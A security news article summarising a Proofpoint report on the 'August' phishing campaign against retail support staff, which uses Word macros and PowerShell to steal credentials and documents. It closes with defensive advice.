A new malware-laden phishing campaign, dubbed August, has been detected targeting customer service and managerial staff at retailers, according to a new report from Proofpoint.
The clever ploy spreads through an email arriving in the inboxes of targeted individuals with subject lines referring to supposed purchases via the company’s website. Recipients are specifically selected who are appropriate reps to deal with customer issues. The message further dupes recipients by saying more detailed information is contained in the attached document. Such subject lines as: “Help: Items vanish from the cart before checkout,” and “Support: Products disappear from the cart during checkout,” are used in the campaign.
Should a recipient click on the link, the August malware is loaded with Word macros and PowerShell. It has capabilities to commandeer credentials and siphon off sensitive documents from the infected computer.
The researchers said the campaign is the work of TA530, an individual or gang which they previously cited for other highly personalized targeted campaigns. The macro, too, works similarly to a previous iteration where sandbox evasion strategies are employed to load the Ursnif banking trojan, evading detection by security researchers. Of particular note in this instance, however, a Powershell command is used to “‘filelessly’ load the payload from a byte array hosted on a remote site,” the researchers said.
The Proofpoint researchers conclude that while this new campaign is currently targeting retail sites, its credential-stealing capabilities could easily be adapted for wider distribution.
“As email lures become increasingly sophisticated and personalized, organizations need to rely more heavily on email gateways capable of detecting macros with sandbox evasion built in as well as user education that addresses emails that do not initially look suspicious,” the researchers said.